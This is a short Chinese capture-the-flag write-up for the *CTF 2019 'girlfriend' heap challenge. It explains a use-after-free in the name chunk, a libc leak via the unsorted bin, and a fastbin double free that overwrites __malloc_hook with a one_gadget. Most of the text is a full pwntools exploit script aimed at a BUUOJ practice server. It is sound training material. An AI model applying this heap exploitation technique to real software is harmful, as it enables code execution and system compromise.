Starctf_2019_girlfriend

<p>[TOC]</p> <h1>分析</h1> <p><img src="https://pic.imgdb.cn/item/63ad9faf08b683016307daba.png" alt="" />  </p> <p>唯一的漏洞就是name的chunk存在UAF，但是输入只有add里面才可以</p> <p><img src="https://pic.imgdb.cn/item/63ad9ff608b6830163089618.png" alt="" />  </p> <p>可以很容易分析出结构为一个girl friend申请一个0x18的chunk，前8个字节用于存储name的chunk指针，中间4个字节存储name的size，最后0xC字节输入call，由于name的size不限定，所以可以申请一个unsortedbin chunk释放后UAF泄露libc地址，再double free攻击 <code>__malloc_hook</code> ，可能需要用到 <code>__libc_realloc</code> </p> <h1>Exploit</h1> <pre><code>from pwn import* # context.log_level = 'debug' # o = process('./pwn') o = remote('node4.buuoj.cn', '27825') libc = ELF('./libc-2.23.so') def add(size, name, call):     o.sendlineafter('Input your choice:', '1')     o.sendlineafter("Please input the size of girl's name", str(size))     o.sendlineafter('please inpute her name:', name)     o.sendlineafter('please input her call:', call)     def show(index):     o.sendlineafter('Input your choice:', '2')     o.sendlineafter('Please input the index:', str(index))     def call(index):     o.sendlineafter('Input your choice:', '4')     o.sendlineafter('Please input the index:', str(index))     add(0x90, 'aaaa', '11111')  # 0 add(0x60, 'bbbb', '22222')  # 1 call(0) show(0) o.recvuntil('name:\n') malloc_hook = u64(o.recv(6)+"\x00\x00") - 0x68 log.info(hex(malloc_hook)) libc_base = malloc_hook - libc.sym['__malloc_hook'] log.info("libc_base: %x", libc_base) libc_realloc = libc_base + libc.sym['__libc_realloc'] one = libc_base + 0xf1147 add(0x70, 'cccc', '123')    # 2 add(0x60, 'cccc', '33333')  # 3 call(1) call(3) call(1) add(0x60, p64(malloc_hook-0x23), '123') add(0x60, 'aaaa', '123') add(0x60, 'aaaa', '123') add(0x60, 'a'*11+p64(one)+p64(libc_realloc+2), '123') o.sendlineafter('Input your choice:', '1') o.interactive() </code></pre> <p><img src="https://pic.imgdb.cn/item/63ada0e208b68301630b0a2f.png" alt="" /></p>